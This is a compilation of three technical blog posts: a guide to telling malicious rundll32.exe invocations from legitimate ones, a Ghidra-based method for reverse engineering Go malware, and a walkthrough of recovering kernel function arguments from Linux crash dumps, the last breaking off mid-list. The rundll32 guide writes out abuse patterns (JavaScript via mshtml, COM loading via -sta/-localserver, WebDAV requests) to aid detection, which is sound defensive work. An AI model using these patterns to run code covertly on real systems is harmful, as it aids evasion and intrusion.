As the name suggests, the “rundll32.exe” executable is used to “RUN DLLs”, or Dynamic Link Libraries (below is the definition of a DLL from MSDN).

A dynamic-link library (DLL) is a module that contains functions and data that can be used by another module (application or DLL) — MSDN

The most basic syntax for using “rundll32.exe” is the following.

rundll32 <DLLname>

The “rundll32.exe” executable can be a child or a parent process; it all depends on the context of the execution. To determine whether an instance of “rundll32.exe” is malicious or not, we need to take a look at a couple of things. First is the path from which it’s being launched, and second is its command line.

The valid “RUNDLL32.EXE” process is always located at:

\Windows\System32\rundll32.exe
\Windows\SysWOW64\rundll32.exe (32bit version on 64bit systems)

As for the command line of a “rundll32.exe” instance, it all depends on what’s being launched, whether it be a CPL file, a DLL install, etc.

For this let’s take a look at a couple of examples.

Running a DLL

In its basic form, “rundll32.exe” will just execute a DLL, so the first thing to check when seeing an instance of “rundll32.exe” is the legitimacy of the DLL being called.

Always check the location from which the DLL is called; for example, a kernel32.dll being called from %temp% is obviously malicious. And as a side note, always check the hash on sites like VT.

SHELL32.DLL — “OpenAs_RunDLL”

“rundll32.exe” can also execute specific functions in DLLs. For example, when selecting a file and performing a right click on it, a context menu will be shown that offers multiple options. One of the options is the “OpenWith” option. Once selected, a pop-up will appear that lets us select from a set of applications on the system.

Behind the scenes this is actually launching the “rundll32.exe” utility with the “shell32.dll” and the “OpenAs_RunDLL” function.

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL <file_path>

This behavior of calling specific functions in a DLL is very common, and it can be tricky to know all of them in advance. Below is a list containing a batch of “rundll32.exe” calls and their meaning.

SHELL32.DLL — “Control_RunDLL”, “Control_RunDLLAsUser” and Control Panel Applets

Image for post

Another common function we’ll see used with the “shell32.dll” is “Control_RunDLL” / “Control_RunDLLAsUser”. These two are used to run “.CPL” files or control panel items.

For example, when we want to change the Date and Time of the computer we launch the applet from the control panel.

Image for post

Behind the scenes, Windows launches a “rundll32.exe” instance with the following command line.

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\timedate.cpl

In addition to verifying the legitimacy of the DLL, when using the “Control_RunDLL” / “Control_RunDLLAsUser” functions you should always check the legitimacy of the “.CPL” file.

Control Panel Items (.CPL)

CPL or Control Panel Items are programs that represent a functionality provided by the Control Panel or, in other terms, they are DLLs that export the CPlApplet function.

A “.CPL” file can contain multiple applets that can be referred to by an applet index and each applet can contain multiple tabs that can be referred to by a tab index.

We can access and request this information via the “rundll32.exe” utility as follows.

Image for post
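The general form of such a call, with @N selecting the applet index and an optional trailing number selecting the tab index, looks roughly like this (reconstructed here as an illustration):

rundll32.exe shell32.dll,Control_RunDLL <name.cpl>,@<applet index>,<tab index>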

For example, the “main.cpl” file in the System32 folder contains two applets. The “Mouse” and “Keyboard” properties. If we want to access the mouse properties and change the pointer, we’ll do it like this.

C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,Control_RunDLL C:\WINDOWS\System32\main.cpl,@0,1

As you can see, one can easily replace the “main.cpl” file with a malicious version and go unnoticed to the untrained eye. In fact, that’s what malware authors have been doing to infect users.

In a normal case scenario, the parent process of a “rundll32.exe” instance with the “Control_RunDLL” function should be “explorer.exe” or “control.exe”.

Other processes can also launch “rundll32.exe” with that function. For example, it can be a child of “Google Chrome”, “MS Edge” or “IE” when launching “inetcpl.cpl” for proxy / network configuration.

If you want more details about CPL and how malware is using it, you can read this trend micro research paper called CPL Malware.

DAVCLNT.DLL — “DavSetCookie” (WebDav Client)

One of the mysterious command lines in a “rundll32.exe” instance that’ll show up a lot in the logs takes the following format.

C:\WINDOWS\System32\rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie <Host> <Share>

When using the “file://” protocol, whether it be in a Word file or via a share, Windows will sometimes use the WebDav client (in some cases, if SMB is disabled) to request these files. When that happens, the request will be made via the “rundll32.exe” utility.

The parent process of such requests will be “svchost.exe”, like so (the “-s WebClient” part is not obligatory):

C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient

Malware like Emotet has already used this technique in the past. So always analyze the host that is present in this type of command line and make sure that everything is legitimate.

RUNDLL32.EXE — “-sta” / “-localserver” Flags

Lesser known command line arguments are “-sta” and “-localserver”, both of which can be used to load malicious registered COM objects.

If you see in your logs a process running with one of the following command line arguments:

rundll32.exe -localserver <CLSID_GUID>
rundll32.exe -sta <CLSID_GUID>

you need to verify the corresponding registry key [HKEY_CLASSES_ROOT\CLSID\<GUID>] and its sub-keys and values for any malicious DLL or SCT script.
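One quick way to eyeball those keys from a terminal is a recursive reg query (the GUID below is a placeholder):

reg query "HKCR\CLSID\{00000000-0000-0000-0000-000000000000}" /s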

I highly suggest you read @bohops’ blog post for a detailed explanation of this technique, and check the Hexacorn blog for the “-localserver” variant.

Abusing the COM Registry Structure: CLSID, LocalServer32, & InprocServer32 — bohops.com

RUNDLL32.EXE — Executing HTML / JAVASCRIPT

One other command line argument that attackers may use with “rundll32.exe” is the “javascript” flag.

In fact, a “rundll32.exe” instance can run HTML / JavaScript code using “mshtml.dll” and the “javascript” keyword (see below).

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication <HTML Code>

I’ve never seen this used in a legitimate way. So if you spot this in your logs, it is worth investigating.

You can check the following resources to learn more about this technique.

Conclusion

Thanks for reading and I hope you enjoyed this quick look at Rundll32.

If you have any feedback or suggestions, send them my way via twitter @nas_bench

References

Reverse Engineering Go Binaries with Ghidra

Reverse Engineering Go Binaries with Ghidra

Original text by Dorka Palotay

Go (also called Golang) is an open source programming language designed by Google in 2007 and made available to the public in 2012. It gained popularity among developers over the years, but it’s not always used for good purposes. As often happens, it attracts the attention of malware developers as well.

Using Go is a tempting choice for malware developers because it supports cross-compiling to run binaries on various operating systems. Compiling the same code for all major platforms (Windows, Linux, macOS) makes the attacker’s life much easier, as they don’t have to develop and maintain different codebases for each target environment.

The Need to Reverse Engineer Go Binaries

Some features of the Go programming language give reverse engineers a hard time when investigating Go binaries. Reverse engineering tools (e.g. disassemblers) can do a great job analyzing binaries that are written in more popular languages (e.g. C, C++, .NET), but Go creates new challenges that make the analysis more cumbersome.

Go binaries are usually statically linked, which means that all of the necessary libraries are included in the compiled binary. This results in large binaries, which make malware distribution more difficult for the attackers. On the other hand, some security products also have issues handling large files. That means large binaries can help malware avoid detection. The other advantage of statically linked binaries for the attackers is that the malware can run on the target systems without dependency issues.

As we have seen continuous growth of malware written in Go and expect more malware families to emerge, we decided to dive deeper into the Go programming language and enhance our toolset to become more effective in investigating Go malware.

In this article, I will discuss two difficulties that reverse engineers face during Go binary analysis and show how we solve them.

Ghidra is an open source reverse engineering tool developed by the National Security Agency, which we frequently use for static malware analysis. It is possible to create custom scripts and plugins for Ghidra to provide specific functionalities that researchers need. We used this feature of Ghidra and created custom scripts to aid our Go binary analysis.

The topics discussed in this article were presented at the Hacktivity2020 online conference. The slides and other materials are available in our Github repository.

Lost Function Names in Stripped Binaries

The first issue is not specific to Go binaries, but stripped binaries in general. Compiled executable files can contain debug symbols which make debugging and analysis easier. When analysts reverse engineer a program that was compiled with debugging information, they can see not only memory addresses, but also the names of the routines and variables. However, malware authors usually compile files without this information, creating so-called stripped binaries. They do this to reduce the size of the file and make reverse engineering more difficult. When working with stripped binaries, analysts cannot rely on the function names to help them find their way around the code. With statically linked Go binaries, where all the necessary libraries are included, the analysis can slow down significantly.

To illustrate this issue, we used simple “Hello Hacktivity” examples written in C[1] and Go[2] for comparison and compiled them to stripped binaries. Note the size difference between the two executables.

Image for post – C and Go executable comparison

Ghidra’s Functions window lists all functions defined within the binaries. In the non-stripped versions function names are nicely visible and are of great help for reverse engineers.

Figure 1 – hello_c[3] function list

Figure 2 – hello_go[5] function list

The function lists for stripped binaries look like the following:

Figure 3 – hello_c_strip[4] function list

Figure 4 – hello_go_strip[6] function list

These examples neatly show that even a simple “hello world” Go binary is huge, having more than a thousand functions. And in the stripped version reverse engineers cannot rely on the function names to aid their analysis.

Note: Due to stripping, not only did the function names disappear, but Ghidra also recognized only 1,139 functions of the 1,790 defined functions.

We were interested in whether there was a way to recover the function names within stripped binaries. First, we ran a simple string search to check if the function names were still available within the binaries. In the C example we looked for the function “main”, while in the Go example it was “main.main”.

Figure 5 – hello_c[3] strings – “main” was found

Figure 6 – hello_c_strip[4] strings – “main” was not found

Figure 7 – hello_go[5] strings – “main.main” was found

Figure 8 – hello_go_strip[6] strings – “main.main” was found

The strings utility could not find the function name in the stripped C binary[4], but “main.main” was still available in the Go version[6]. This discovery gave us some hope that function name recovery could be possible in stripped Go binaries.

Loading the binary[6] into Ghidra and searching for the “main.main” string will show its exact location. As can be seen in the image below, the function name string is located within the .gopclntab section.

Figure 9 – hello_go_strip[6] main.main string in Ghidra

The pclntab structure is available since Go 1.2 and nicely documented. The structure starts with a magic value followed by information about the architecture. Then the function symbol table holds information about the functions within the binary. The address of the entry point of each function is followed by a function metadata table.

Image for post – pclntab structure

The function metadata table, among other important information, stores an offset to the function name.

It is possible to recover the function names by using this information. Our team created a script (go_func.py) for Ghidra to recover function names in stripped Go ELF files by executing the following steps (a simplified sketch of the idea is shown after the list):

  • Locates the pclntab structure
  • Extracts the function addresses
  • Finds function name offsets
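To give a feel for the approach, below is a heavily simplified sketch of that logic in Ghidra’s Python (Jython) API. It assumes a 64-bit ELF with the Go 1.2–1.15 pclntab layout and locates the structure simply via the .gopclntab section name; the real go_func.py is more thorough (magic-value scanning, error handling, other layouts, invalid symbol characters):

# Simplified sketch of the go_func.py approach (not the actual script)
from ghidra.program.model.symbol import SourceType

pclntab = getMemoryBlock(".gopclntab")              # Linux ELF section holding the pclntab
base = pclntab.getStart()
assert (getInt(base) & 0xffffffff) == 0xfffffffb    # Go 1.2 pclntab magic value

ptrsize = getByte(base.add(7)) & 0xff               # header: magic(4), 0x00, 0x00, quantum, ptrsize
nfunc = int(getLong(base.add(8)))                   # number of entries in the function symbol table
functab = base.add(8 + ptrsize)                     # pairs of (function address, func-struct offset)

def read_cstring(addr):
    s = ""
    b = getByte(addr)
    while b != 0:
        s += chr(b & 0xff)
        addr = addr.add(1)
        b = getByte(addr)
    return s

for i in range(nfunc):
    entry = toAddr(getLong(functab.add(i * 2 * ptrsize)))            # function entry point
    funcdata = base.add(getLong(functab.add(i * 2 * ptrsize + ptrsize)))
    nameoff = getInt(funcdata.add(ptrsize))                          # int32 offset to the name string
    name = read_cstring(base.add(nameoff))
    func = getFunctionAt(entry)
    if func is None:
        createFunction(entry, name)                                  # also defines unrecognized functions
    else:
        func.setName(name, SourceType.USER_DEFINED)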

Executing our script not only restores the function names, but it also defines previously unrecognized functions.

Figure 10 – hello_go_strip[6] function list after executing go_func.py

To see a real-world example, let’s look at an eCh0raix ransomware sample[9]:

Figure 11 – eCh0raix[9] function list

Figure 12 – eCh0raix[9] function list after executing go_func.py

This example clearly shows how much help the function name recovery script can be during reverse engineering. Analysts can assume that they are dealing with ransomware just by looking at the function names.

Note: There is no specific section for the pclntab structure in Windows Go binaries, and researchers need to explicitly search for the fields of this structure (e.g. magic value, possible field values). For macOS, the _gopclntab section is available, similar to .gopclntab in Linux binaries.

Challenges: Undefined Function Name Strings

If a function name string is not defined by Ghidra, then the function name recovery script will fail to rename that specific function, since it cannot find the function name string at the given location. To overcome this issue our script always checks if a defined data type is located at the function name address and, if not, tries to define a string data type at the given address before renaming a function.

In the example below, the function name string “log.New” is not defined in an eCh0raix ransomware sample[9], so the corresponding function cannot be renamed without creating a string first.

Figure 13 – eCh0raix[9] log.New function name undefined

Figure 14 – eCh0raix[9] log.New function couldn’t be renamed

The following lines in our script solve this issue:

Figure 15 – go_func.py

Unrecognized Strings in Go Binaries

The second issue that our scripts are solving is related to strings within Go binaries. Let’s turn back to the “Hello Hacktivity” examples and take a look at the defined strings within Ghidra.

70 strings are defined in the C binary[3], with “Hello, Hacktivity!” among them. Meanwhile, the Go binary[5] includes 6,540 strings, but searching for “hacktivity” gives no result. Such a high number of strings already makes it hard for reverse engineers to find the relevant ones but, in this case, the string that we expected to find was not even recognized by Ghidra.

Figure 16 – hello_c[3] defined strings with “Hello, Hacktivity!”

Figure 17 – hello_go[5] defined strings without “hacktivity”

To understand this problem, you need to know what a string is in Go. Unlike in C-like languages, where strings are sequences of characters terminated with a null character, strings in Go are sequences of bytes with a fixed length. Strings are Go-specific structures, built up by a pointer to the location of the string and an integer, which is the length of the string.

These strings are stored within Go binaries as a large string blob, which consists of the concatenation of the strings without null characters between them. So, while searching for “Hacktivity” using strings and grep gives the expected result in C, it returns a huge string blob containing “hacktivity” in Go.

Figure 18 – hello_c[3] string search for “Hacktivity”

Figure 19 – hello_go[5] string search for “hacktivity”

Since strings are defined differently in Go, and the way they are referenced within the assembly code also differs from the usual C-like solutions, Ghidra has a hard time identifying strings within Go binaries.

The string structure can be allocated in many different ways: it can be created statically or dynamically during runtime, it varies between architectures, and there might even be multiple solutions within the same architecture. To solve this issue, our team created two scripts to help with identifying strings.
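Whatever the allocation pattern, once a script has recovered a (pointer, length) pair, telling Ghidra about it is simple. A minimal illustration in Ghidra’s Python API (not the actual scripts; str_addr and str_len are assumed to have been recovered already):

# Define a Go string in Ghidra once its address and length are known
def define_go_string(str_addr, str_len):
    addr = toAddr(str_addr)
    if getDataAt(addr) is not None:       # clear any falsely defined data first
        removeDataAt(addr)
    createAsciiString(addr, str_len)      # fixed-length string, no null terminator expected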

Dynamically Allocating String Structures

In the first case, string structures are created during runtime. A sequence of assembly instructions is responsible for setting up the structure before a string operation. Due to the different instruction sets, the structure varies between architectures. Let’s go through a couple of use cases and show the instruction sequences that our script (find_dynamic_strings.py) looks for.

Dynamically Allocating String Structures for x86

First, let’s start with the “Hello Hacktivity” example[5].

Figure 20 – hello_go[5] dynamic allocation of string structure

Figure 21 – hello_go[5] undefined “hello, hacktivity” string

After running the script, the code looks like this:

Figure 22 – hello_go[5] dynamic allocation of string structure after executing find_dynamic_strings.py

The string is defined:

Figure 23 – hello_go[5] defined “hello hacktivity” string

And “hacktivity” can be found in the Defined Strings view in Ghidra:

Figure 24 – hello_go[5] defined strings with “hacktivity”

The script looks for the following instruction sequences in 32-bit and 64-bit x86 binaries:

Figure 25 – eCh0raix[9] dynamic allocation of string structure

Figure 26 – hello_go[5] dynamic allocation of string structure

ARM Architecture and Dynamic String Allocation

For the 32-bit ARM architecture, I use the eCh0raix ransomware sample[10] to illustrate string recovery.

Figure 27 – eCh0raix[10] dynamic allocation of string structure

Figure 28 – eCh0raix[10] pointer to string address

Figure 29 – eCh0raix[10] undefined string

After executing the script, the code looks like this:

Figure 30 – eCh0raix[10] dynamic allocation of string structure after executing find_dynamic_strings.py

The pointer is renamed, and the string is defined:

Figure 31 – eCh0raix[10] pointer to string address after executing find_dynamic_strings.py

Figure 32 – eCh0raix[10] defined string after executing find_dynamic_strings.py

The script looks for the following instruction sequence in 32-bit ARM binaries:

For the 64-bit ARM architecture, let’s use a Kaiji sample[12] to illustrate string recovery. Here, the code uses two instruction sequences that differ only slightly.

Figure 33 – Kaiji[12] dynamic allocation of string structure

After executing the script, the code looks like this:

Figure 34 – Kaiji[12] dynamic allocation of string structure after executing find_dynamic_strings.py

The strings are defined:

Figure 35 – Kaiji[12] defined strings after executing find_dynamic_strings.py

The script looks for the following instruction sequences in 64-bit ARM binaries:

As you can see, a script can recover dynamically allocated string structures. This helps reverse engineers read the assembly code or look for interesting strings within the Defined String view in Ghidra.

Challenges for This Approach

The biggest drawback of this approach is that each architecture (and even each different solution within the same architecture) requires a new branch to be added to the script. It is also very easy to evade these predefined instruction sets. In the example below, from a Kaiji 64-bit ARM malware sample[12], the length of the string is moved into an earlier register; the script does not expect this and will therefore miss the string.

Figure 36 – Kaiji[12] dynamic allocation of string structure in an unusual way

Figure 37 – Kaiji[12] an undefined string

Statically Allocated String Structures

In this next case, our script (find_static_strings.py) looks for string structures that are statically allocated. This means that the string pointer is followed by the string length within the data section of the code.
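The core idea can be sketched as follows in Ghidra’s Python API (an illustration only, assuming a 64-bit binary and scanning a single data block; the section name, the length limit and the printable-ASCII check are simplifications of what find_static_strings.py actually does, and error handling is omitted):

# Sketch: scan a data block for statically allocated Go string structures,
# i.e. a string address immediately followed by the string length
MAX_LEN = 100                                      # arbitrary sanity limit

block = getMemoryBlock(".rodata")                  # example data section
addr = block.getStart()
end = block.getEnd()
mem = currentProgram.getMemory()

while addr.add(16).compareTo(end) < 0:
    ptr = getLong(addr)                            # candidate string address
    length = int(getLong(addr.add(8)))             # candidate string length
    if 0 < length <= MAX_LEN and mem.contains(toAddr(ptr)):
        chars = [chr(getByte(toAddr(ptr).add(i)) & 0xff) for i in range(length)]
        if all(0x20 <= ord(c) <= 0x7e for c in chars):     # printable ASCII only
            createAsciiString(toAddr(ptr), length)         # define the string itself
    addr = addr.add(8)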

This is how it looks in the x86 eCh0raix ransomware sample[9].

Figure 38 – eCh0raix[9] static allocation of string structures

In the image above, string pointers are followed by string length values; however, Ghidra couldn’t recognize the addresses or the integer data types, except for the first pointer, which is directly referenced in the code.

Figure 39 – eCh0raix[9] string pointer

Undefined strings can be found by following the string addresses.

Figure 40 – eCh0raix[9] undefined strings

After executing the script, string addresses will be defined, along with the string length values and the strings themselves.

Figure 41 – eCh0raix[9] static allocation of string structures after executing find_static_strings.py

Figure 42 – eCh0raix[9] defined strings after executing find_static_strings.py

Challenges: Eliminating False Positives and Missing Strings

We want to eliminate false positives, which is why we:

  • Limit the string length
  • Search for printable characters
  • Search in data sections of the binaries

Obviously, strings can easily slip through as a result of these limitations. If you use the script, feel free to experiment, change the values, and find the best settings for your analysis. The following lines in the code are responsible for the length and character set limitations:

Figure 43 – find_static_strings.py

Figure 44 – find_static_strings.py

Further Challenges in String Recovery

Ghidra’s auto analysis might falsely identify certain data types. If this happens, our script will fail to create the correct data at that specific location. To overcome this issue the incorrect data type has to be removed first, and then the new one can be created.

For example, let’s take a look at the eCh0raix ransomware[9] with statically allocated string structures.

Figure 45 – eCh0raix[9] static allocation of string structures

Here the addresses are correctly identified; however, the string length values (which are supposed to be integer data types) are falsely defined as undefined4 values.

The following lines in our script are responsible for removing the incorrect data types:

Figure 46 – find_static_strings.py

After executing the script, all data types are correctly identified and the strings are defined.

Figure 47 – eCh0raix[9] static allocation of string structures after executing find_static_strings.py

Another issue comes from the fact that strings are concatenated and stored as a large string blob in Go binaries. In some cases, Ghidra defines a whole blob as a single string. These can be identified by the high number of offcut references. Offcut references are references to certain parts of the defined string, not the address where the string starts, but rather a place inside the string.

The example below is from an ARM Kaiji sample[12].

Figure 48 – Kaiji[12] falsely defined string in Ghidra

Figure 49 – Kaiji[12] offcut references of a falsely defined string

To find falsely defined strings, one can use the Defined Strings window in Ghidra and sort the strings by offcut reference count. Large strings with numerous offcut references can be undefined manually before executing the string recovery scripts. This way the scripts can successfully create the correct string data types.

Figure 50 – Kaiji[12] defined strings

Lastly, we will show an issue in the Ghidra Decompile view. Once a string is successfully defined either manually or by one of our scripts, it will be nicely visible in the listing view of Ghidra, helping reverse engineers read the assembly code. However, the Decompiler view in Ghidra cannot handle fixed-length strings correctly and, regardless of the length of the string, it will display everything until it finds a null character. Luckily, this issue will be solved in the next release of Ghidra (9.2).

This is how the issue looks with the eCh0raix sample[9].

Figure 51 – eCh0raix[9] defined string in listing view

Figure 52 – eCh0raix[9] defined string in Decompile view

Future Work with Reverse Engineering Go

This article focused on the solutions for two issues within Go binaries to help reverse engineers use Ghidra and statically analyze malware written in Go. We discussed how to recover function names in stripped Go binaries and proposed several solutions for defining strings within Ghidra. The scripts that we created and the files we used for the examples in this article are publicly available, and the links can be found below.

This is just the tip of the iceberg when it comes to the possibilities for Go reverse engineering. As a next step, we are planning to dive deeper into Go function call conventions and the type system.

In Go binaries arguments and return values are passed to functions by using the stack, not the registers. Ghidra currently has a hard time correctly detecting these. Helping Ghidra to support Go’s calling convention will help reverse engineers understand the purpose of the analyzed functions.

Another interesting topic is the types within Go binaries. Just as we’ve shown by extracting function names from the investigated files, Go binaries also store information about the types used. Recovering these types can be a great help for reverse engineering. In the example below, we recovered the main.Info structure in an eCh0raix ransomware sample[9]. This structure tells us what information the malware is expecting from the C2 server.

Figure 53 – eCh0raix[9] main.info structure

Figure 54 – eCh0raix[9] main.info fields

Figure 55 – eCh0raix[9] main.info structure

As you can see, there are still many interesting areas to discover within Go binaries from a reverse engineering point of view. Stay tuned for our next write-up.

Github repository with scripts and additional materials

Files used for the research

File name            SHA-256
[1]  hello.c             ab84ee5bcc6507d870fdbb6597bed13f858bbe322dc566522723fd8669a6d073
[2]  hello.go            2f6f6b83179a239c5ed63cccf5082d0336b9a86ed93dcf0e03634c8e1ba8389b
[3]  hello_c             efe3a095cea591fe9f36b6dd8f67bd8e043c92678f479582f61aabf5428e4fc4
[4]  hello_c_strip       95bca2d8795243af30c3c00922240d85385ee2c6e161d242ec37fa986b423726
[5]  hello_go            4d18f9824fe6c1ce28f93af6d12bdb290633905a34678009505d216bf744ecb3
[6]  hello_go_strip      45a338dfddf59b3fd229ddd5822bc44e0d4a036f570b7eaa8a32958222af2be2
[7]  hello_go.exe        5ab9ab9ca2abf03199516285b4fc81e2884342211bf0b88b7684f87e61538c4d
[8]  hello_go_strip.exe  ca487812de31a5b74b3e43f399cb58d6bd6d8c422a4009788f22ed4bd4fd936c
[9]  eCh0raix – x86      154dea7cace3d58c0ceccb5a3b8d7e0347674a0e76daffa9fa53578c036d9357
[10] eCh0raix – ARM      3d7ebe73319a3435293838296fbb86c2e920fd0ccc9169285cc2c4d7fa3f120d
[11] Kaiji – x86_64      f4a64ab3ffc0b4a94fd07a55565f24915b7a1aaec58454df5e47d8f8a2eec22a
[12] Kaiji – ARM         3e68118ad46b9eb64063b259fca5f6682c5c2cb18fd9a4e7d97969226b2e6fb4

References and further reading

Solutions by other researchers for various tools

IDA Pro

radare2 / Cutter

Binary Ninja

Ghidra

Extracting kernel stack function arguments from Linux x86-64 kernel crash dumps

Original text

Introduction

It’s common, when analysing a kernel crash dump, to look at kernel tasks’ stack backtraces in order to see what the tasks are doing, e.g. what nested function calls led to the current position; this is easily displayed by the crash utility. We often want also to know the arguments to those function calls; unfortunately these are not so easily displayed.

This blog will illustrate some techniques for extracting kernel function call arguments, where possible, from the crash dump. Several worked examples are given. The examples are from the Oracle UEK kernel, but the techniques are applicable to any Linux kernel.

Note: The Python-Crash API toolkit pykdump includes the command fregs, which automates some of this process. However, it is useful to study how to do it manually, in order to understand what’s going on, and to be able to do it when pykdump may not be available, or if fregs fails to produce the desired result.

Basics

This section gives the minimum detail needed to use the techniques. Background explanatory detail will be given in a subsequent section.

You need to know a little bit of the x86 instruction set, but not much. You can get started knowing just that mov %r12,%rdi places the contents of cpu register %r12 into register %rdi, and that mov 0x8(%r14),%rcx takes the contents of register %r14, adds 8 to it, takes the result as the address of a memory location, reads the value at that memory location and puts it into register %rcx.

For the Linux kernel running on the x86-64 architecture, kernel function arguments are normally passed using 64-bit cpu registers. The first six arguments to a function are passed in the following cpu registers, respectively: %rdi, %rsi, %rdx, %rcx, %r8, %r9.

To slightly complicate matters, these 64-bit register contents may be accessed via shorter subsets under different names (for compatibility with previous 32/16/8-bit instruction sets), as shown in the following table:
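64-bit   32-bit   16-bit   8-bit
%rdi     %edi     %di      %dil
%rsi     %esi     %si      %sil
%rdx     %edx     %dx      %dl
%rcx     %ecx     %cx      %cl
%r8      %r8d     %r8w     %r8b
%r9      %r9d     %r9w     %r9b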

The contents of these registers are not preserved (for every kernel function call) in the crash dump. However, it is often possible to extract the values that were placed into these registers, from the kernel stack, or from memory.

In order to find out the arguments supplied to a given function, we need to look at the disassembled code for either the calling function, the called function, or both.

If we disassemble the caller’s code, we can see where it obtained the values to place into the registers used to pass the arguments to the called function. We can also disassemble the called function, to see if it stored the values it was passed in those registers, to its stack or to memory.

We may then be able to extract those values from the same place, if that is either on the kernel stack, or in kernel memory (if it has not been subsequently changed), both of which are normally included in the crash dump.

The techniques shown cover different ways that the compiler might have chosen to store the values that are passed in the registers:

  • The calling function might retrieve the values from:
    • Memory
    • The calling function’s stack, via an offset from the (fixed) base of the stack
    • Another register, which got its value from one of these above in turn
  • The called function might save the values it received in the registers, to:
    • Memory
    • The called function’s stack, via push
    • Another register, which might itself then be saved in turn

Therefore the technique we use is to:

  • Disassemble either or both of:
    • The calling function, leading up to the callq instruction, to see from where it obtains the values it passes to the called function in the registers
    • The called function, to see whether it puts the values from the registers onto its stack, or into memory
  • Inspect those areas (caller/callee stack and/or memory) to see if the values may be extracted

In some cases, it might not be possible to use any of the above methods to find the arguments passed. If this is the case, consider looking at another level of the stack: it’s quite common for the same value to be passed down from one function to the next. Thus although you might be unsuccessful trying to recover that argument’s value using the above methods for your function of interest, that same value might be passed down to further functions (or itself been passed down from earlier functions), and you might have more luck finding it looking at one of those other functions, using the methods above. The value might also be itself contained in another structure, which may be passed in a function argument. A knowledge of the code in question obviously helps in this case.

Finding a function’s stack frame base pointer

For some of the methods noted above, we will need to know how to find the (fixed) base of a kernel function’s stack. Whilst the function is executing, this is stored in the %rbp register, the function’s stack frame base pointer. We may find it in two places in the kernel task’s stack backtrace.

To show a kernel task’s stack backtrace, use bt:

Note: -sx tells bt to try to show addresses as a symbol name plus a hex offset.

The above lists the functions calls found in the stack; we also want to see the actual stack content, i.e. the content of the stack frames, for each function call. Let’s say we are interested in the arguments passed to the mutex_lock call; we may therefore need to look at its caller, which is do_last, so let’s concentrate on its stack frame:

Note: -FF tells bt to show all the data for a stack frame, symbolically, with its slab cache name, if appropriate.

The stack frame of the calling function do_last is shown above. Its stack frame base pointer 0xffff88180dc37d58 appears in two locations, shown highlighted with ***.

The stack frame base pointer, for a function, may be found:

  • As the second-last value in the stack frame above the function (i.e. above in the bt output)
  • As the location of the second-last value in the stack frame for the function

For now, just use the above to find the value of the stack frame base pointer, for a function, if you need it. The structure of the stack frame will be explained in the following section.

Summary of steps

  1. Note which registers you need, corresponding to the position of the called function’s arguments you need
    1. Refer to the register-naming table above, in case the quantities passed are smaller than 64-bit, e.g. integers and other non-pointer types. The 1st argument will be passed in %rdi, %edi, %di or %dil. Note that all the names contain “di”.
  2. Disassemble the calling function, and inspect the instructions leading up to where it calls the function you’re interested in. Note from where the compiler gets the values it places in those registers
    1. If from the stack, find the caller’s stack frame base pointer, and from there find the value in the stack frame
    2. If from memory, can you calculate the memory address used? If so, read the value from memory
    3. If from another register, from where was that register’s contents obtained? And see case 3.3 below.
  3. Disassemble the first part of the called function. Note where it stores the values passed in the registers you need
    1. If onto the stack, find the called function’s stack frame base pointer, and find the value in the stack frame
    2. If from memory, can you calculate the memory address used? If so, read the value from memory
    3. If the calling function obtained the value from another register (case 2.3 above) does the called function save that register to stack/memory?
  4. If none of the above gave a usable result, see if the values you need are passed to another function call further up or down the stack, or may be derived from a different value.
    1. For example the structure you want is referenced from another structure that is passed to a function elsewhere in the stack trace
  5. Once you’ve obtained answers, perform a sanity check
    1. Is the value obtained on a slab cache? If so, is the cache of the expected type?
    2. Is the value, or what it points to, of the expected type?
    3. If the value is a pointer to a structure, does the structure content look correct? e.g. pointers where pointers are expected, function op pointers pointing to real functions, etc
  6. Read the Caveats section, to understand whether you can rely on the answer you’ve found

At this point, you may either skip directly to the Worked Examples , or read on for more detail.

In more depth

This section gives more background. If you’re in a hurry, skip directly to the Worked Examples, and come back and read this later; it may help in understanding what’s going on, and in identifying edge cases and other apparently odd behaviour.

In Linux on x86-64, the kernel stack grows down, from larger towards smaller memory addresses. That is, a particular function’s stack frame grows downwards from its fixed stack frame base pointer %rbp, with new elements being added via the push instruction. push first decrements the current stack pointer %rsp (which points to the item on the «top» (lowest memory address) of the stack) by the size of the element being pushed, then copies its argument to the stack location now pointed at by %rsp, leaving %rsp pointing at the new item on top of the stack.

However, the bt command shows the stack in ascending memory order, as you read down the page. Therefore we may imagine the bt display of a stack frame as like a pile of magazines stacked up on the table. The top line shown is the top of the stack, which is stored in the stack pointer register %rsp, and is where new items are pushed onto the stack (magazines added to the pile). The bottom line is the stack frame base (the table), which is fixed, stored in the stack frame base pointer %rbp (yes, I’m neglecting the function’s return address here).

Kernel function stack frame layout

The stack consists of multiple frames, one per function. The layout of a kernel function’s stack frame is as follows (in the ascending memory location order as shown by bt):

This is built-up in stages, as follows. When a function is called the callq instruction does two things:

  • Pushes the address of the instruction following the callq instruction onto the stack (still the caller’s stack frame, at this point). This will be the return address for the called function.
  • Jumps to the first instruction in the called function.

At this point, what will become the stack frame for the called function now looks like this:

The compiler has inserted the following preamble instructions before the start of the code for most called functions:
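push   %rbp
mov    %rsp,%rbp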

The push puts the caller’s stack frame base pointer on top of the stack frame, which now looks like this:

The mov changes the stack frame base pointer register %rbp to also point to the top of the stack, which now looks like this:

From now on, %rsp gets decremented as we add things to the top of the stack, but %rbp remains fixed, denoting the base of the stack. Below that, at the very bottom, is the return address, which records the location of the instruction after the callq instruction, in the calling function (this is the instruction to which this called function will return, via the retq instruction). From now on, the called function’s stack frame looks like this:
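In ascending memory order (as shown by bt), roughly:

    (top of stack, lowest address)  <- %rsp, moves down with each new push
    ... subsequent pushes / locals made by the called function ...
    saved caller's %rbp             <- this location is the called function's %rbp (frame base)
    return address                  <- address of the instruction after the caller's callq
    (higher addresses: the caller's stack frame continues below)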

Caveats

  • The description here applies to arguments of simple type, e.g. integer, long, pointer, etc. Things are not quite the same for more complex types, e.g. struct (as a struct, not a pointer to a struct), float, etc. For more detail, refer to the References.
  • Remember that the crash dump contains data from when the system crashed, not from the point of execution of the instruction you may be looking at. For example:
    • Memory content will be that of when the system crashed, which may be many function calls deeper in the stack below where you are looking, some of which may have overwritten that area of memory
